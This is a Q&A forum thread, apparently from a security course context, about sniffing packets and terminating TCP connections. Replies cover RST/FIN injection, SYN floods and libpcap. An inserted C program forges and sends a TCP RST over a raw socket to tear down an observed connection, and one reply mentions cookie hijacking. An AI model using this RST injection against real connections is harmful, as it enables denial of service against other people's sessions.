I have to write a program that sniffs network packets (part 1, the simple part),
and I have to update the program (part 2) so that it will be able to terminate connections.
The specific requirements are:
Construct raw packets by specifying data link layer and network layer information, including appropriate source and destination MAC and IP addresses. These packets are intended to terminate the connection. To do so, you should use SOCK_RAW as the socket type to be able to set the header information yourself.
Can anybody give me some ideas on the second part?
Should I hijack the session, apply a DoS attack on one of the users?

All I need is some tips on how to terminate the connection. I am using the C programming language, and this is a course assignment for the security course.

A: 

Depends on what you mean by terminate connections. You might mean providing an end-point for a TCP circuit or UDP stream.

Or you could mean sending an acceptable RST in the middle of a TCP stream to indicate the end of the stream. To achieve this you have to know the sequence number expected by the other side amongst other things.

Either way, it is obvious you haven't been paying attention in class. The entire point of the assignment, it seems, is to show you understand the raw layout of IP packets and possibly TCP/UDP. I suggest you purchase a textbook on the subject (no doubt recommended by your lecturer) and/or take a read of Wikipedia.

PP
Actually, I couldn't attend class on the day the assignment was issued, therefore I am not 100% sure about the requirements. Anyway, I read about RST; I think I will be able to implement such a thing :) Do you have any other ideas? Is it possible to DoS one of the users on one of his open ports (so I can close the port)? Can I send a FIN packet to one of the users?
scatman
Yes you can DOS, yes you can send FIN packets, in fact you can send any packet you want. The information is out there on the Internet and, it seems, on tap at your university. So if you choose to neither attend lectures nor discover basic networking concepts on your own time then of course you can't solve this problem. And I'm not solving it for you!
PP
+1  A: 

For this assignment I would use pypcap, which is a Python packet capture and injection library. Pypcap uses raw sockets to forge packets. If for some strange reason you are forced to use C then this project will be more difficult. In this case you should use libpcap to sniff the line, and the raw socket library will depend on the platform you develop on.

You can sniff the line looking for TCP sequence IDs. Based on this ID you can forge an RST or FIN to break one side of the connection. The hard part will be trying to maintain the TCP connection using raw sockets. It will be nearly impossible to maintain the application layer connection; HTTP would be an easier protocol to maintain, but if it were HTTP it would be easier to just hijack the cookie.

Rook
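The RST approach that PP and Rook describe, as an added example in C that is not part of the original thread: the sniffer has observed one segment from host A to host B (addresses, ports, SEQ, ACK and payload length are constructed values here), and the program forges an RST/ACK as if B had sent it back to A. The SEQ of the forged packet is A's last ACK number (what A expects to receive next), the ACK covers everything A has sent so far, and both the IPv4 header checksum and the TCP pseudo-header checksum are computed by hand, since with SOCK_RAW nothing else will do it. The optional send in main() uses IP_HDRINCL on a Linux/BSD raw socket and needs root; the data-link layer (MAC addresses) the assignment also asks for would require an AF_PACKET socket on Linux and is not shown.

```c
/* Added example, not from the original thread: forge a TCP RST that tears
 * down an observed connection. All addresses, ports and sequence numbers
 * are constructed for the demonstration. Build: cc -o rst rst.c */
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <arpa/inet.h>
#include <netinet/in.h>
#include <sys/socket.h>

#define IPV4_HDR_LEN 20
#define TCP_HDR_LEN  20
#define TH_RST 0x04
#define TH_ACK 0x10

/* What a sniffer learned from the last segment seen going A -> B. */
struct observed_segment {
    const char *src_ip, *dst_ip;   /* dotted quads: A (sender) and B (receiver) */
    uint16_t src_port, dst_port;
    uint32_t seq;                  /* A's sequence number */
    uint32_t ack;                  /* A's acknowledgement number = B's next SEQ */
    uint16_t payload_len;          /* data bytes carried by that segment */
};

static void put16(uint8_t *p, uint16_t v) { p[0] = (uint8_t)(v >> 8); p[1] = (uint8_t)v; }
static void put32(uint8_t *p, uint32_t v) { put16(p, (uint16_t)(v >> 16)); put16(p + 2, (uint16_t)v); }

/* RFC 1071 one's-complement sum over big-endian 16-bit words. */
static uint32_t csum_add(uint32_t sum, const uint8_t *p, size_t len)
{
    while (len > 1) { sum += (uint32_t)((p[0] << 8) | p[1]); p += 2; len -= 2; }
    if (len) sum += (uint32_t)(p[0] << 8);       /* odd trailing byte */
    return sum;
}
static uint16_t csum_fin(uint32_t sum)
{
    while (sum >> 16) sum = (sum & 0xffff) + (sum >> 16);
    return (uint16_t)~sum;
}

/* Write the TCP pseudo-header (src, dst, zero, proto, tcp length) for pkt. */
static void tcp_pseudo(const uint8_t *pkt, uint16_t tcp_len, uint8_t pseudo[12])
{
    memcpy(pseudo, pkt + 12, 8);                 /* IPv4 src and dst */
    pseudo[8] = 0; pseudo[9] = 6;                /* zero, protocol TCP */
    put16(pseudo + 10, tcp_len);
}

/* Checks a received or built packet; a correct checksum sums to zero. */
int ip_checksum_ok(const uint8_t *pkt) { return csum_fin(csum_add(0, pkt, IPV4_HDR_LEN)) == 0; }
int tcp_checksum_ok(const uint8_t *pkt, size_t pkt_len)
{
    uint8_t pseudo[12];
    size_t tcp_len = pkt_len - IPV4_HDR_LEN;
    tcp_pseudo(pkt, (uint16_t)tcp_len, pseudo);
    return csum_fin(csum_add(csum_add(0, pseudo, 12), pkt + IPV4_HDR_LEN, tcp_len)) == 0;
}

/* Fill out[] with an IPv4+TCP RST/ACK forged as B -> A. Returns length or -1. */
int build_rst(const struct observed_segment *s, uint8_t out[IPV4_HDR_LEN + TCP_HDR_LEN])
{
    uint8_t src[4], dst[4], pseudo[12];
    /* The RST travels from B back to A, so the observed addresses swap roles. */
    if (inet_pton(AF_INET, s->dst_ip, src) != 1 || inet_pton(AF_INET, s->src_ip, dst) != 1)
        return -1;

    uint8_t *ip = out, *tcp = out + IPV4_HDR_LEN;
    memset(out, 0, IPV4_HDR_LEN + TCP_HDR_LEN);

    ip[0] = 0x45;                                /* version 4, IHL 5 */
    put16(ip + 2, IPV4_HDR_LEN + TCP_HDR_LEN);   /* total length */
    put16(ip + 4, 0x1234);                       /* identification (constructed) */
    put16(ip + 6, 0x4000);                       /* DF, fragment offset 0 */
    ip[8] = 64;                                  /* TTL */
    ip[9] = 6;                                   /* protocol TCP */
    memcpy(ip + 12, src, 4);
    memcpy(ip + 16, dst, 4);
    put16(ip + 10, csum_fin(csum_add(0, ip, IPV4_HDR_LEN)));

    put16(tcp + 0, s->dst_port);                 /* B's port is now the source */
    put16(tcp + 2, s->src_port);
    put32(tcp + 4, s->ack);                      /* SEQ: exactly what A expects next */
    put32(tcp + 8, s->seq + s->payload_len);     /* ACK: everything A has sent */
    tcp[12] = (TCP_HDR_LEN / 4) << 4;            /* data offset 5, no options */
    tcp[13] = TH_RST | TH_ACK;
    put16(tcp + 14, 0);                          /* window is irrelevant for RST */
    tcp_pseudo(out, TCP_HDR_LEN, pseudo);
    put16(tcp + 16, csum_fin(csum_add(csum_add(0, pseudo, 12), tcp, TCP_HDR_LEN)));
    return IPV4_HDR_LEN + TCP_HDR_LEN;
}

int main(void)
{
    /* Constructed observation: 10.0.0.2:51515 -> 10.0.0.1:80, 100 bytes of data. */
    struct observed_segment seen = { "10.0.0.2", "10.0.0.1", 51515, 80, 1000, 5000, 100 };
    uint8_t pkt[IPV4_HDR_LEN + TCP_HDR_LEN];
    int len = build_rst(&seen, pkt);
    if (len < 0) return 1;
    printf("built %d-byte RST, ip csum ok=%d, tcp csum ok=%d\n",
           len, ip_checksum_ok(pkt), tcp_checksum_ok(pkt, (size_t)len));

    /* Injection needs root; IP_HDRINCL tells the kernel the IP header is ours. */
    int fd = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
    if (fd < 0) { perror("socket(SOCK_RAW) needs root"); return 0; }
    int one = 1;
    setsockopt(fd, IPPROTO_IP, IP_HDRINCL, &one, sizeof one);
    struct sockaddr_in to; memset(&to, 0, sizeof to);
    to.sin_family = AF_INET;
    memcpy(&to.sin_addr, pkt + 16, 4);
    if (sendto(fd, pkt, (size_t)len, 0, (struct sockaddr *)&to, sizeof to) < 0) perror("sendto");
    close(fd);
    return 0;
}
```

The SEQ field is the part that matters: the RST is only honoured if it falls inside A's receive window, and stacks implementing RFC 5961 accept it without argument only when SEQ equals A's RCV.NXT exactly, answering an in-window but inexact RST with a challenge ACK instead. That is why the sniffing half of the assignment has to track the live ACK numbers rather than just the addresses and ports.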
A: 

I can't help you with C libraries - not my forte, but it seems like there should be something out there.

But it seems like what you are trying to do in part 2 is to prevent a DoS, not cause one!

Check here:

http://en.wikipedia.org/wiki/Denial-of-service_attack

for stuff on DoS attacks. As PP says, there are a number of attacks relating to connection misuse, so you want to figure out which one your assignment is about; that one you need to check out with your prof. For example, the Wiki page above mentions SYN floods, but almost any connection-oriented protocol will be at risk for an attack that fills up the connection pool with too many connection requests and then doesn't ever close them.

I assume, reading the assignment, that your job is to figure out how to fix this by closing the connections that the attacker opened. Which means you both have to figure out how the attack works, and then figure out how to recover from it.

HINT: Hitting the server with a flood of close-connection requests is not an attack. It's not that useful, either, since you aren't necessarily closing the connections that are open. But the damage is caused by open-connection requests. See here:

http://en.wikipedia.org/wiki/SYN_flood

For one example.

bethlakshmi
A: 

You can use libpcap to help with the packet sniffing. libpcap was developed by the tcpdump team.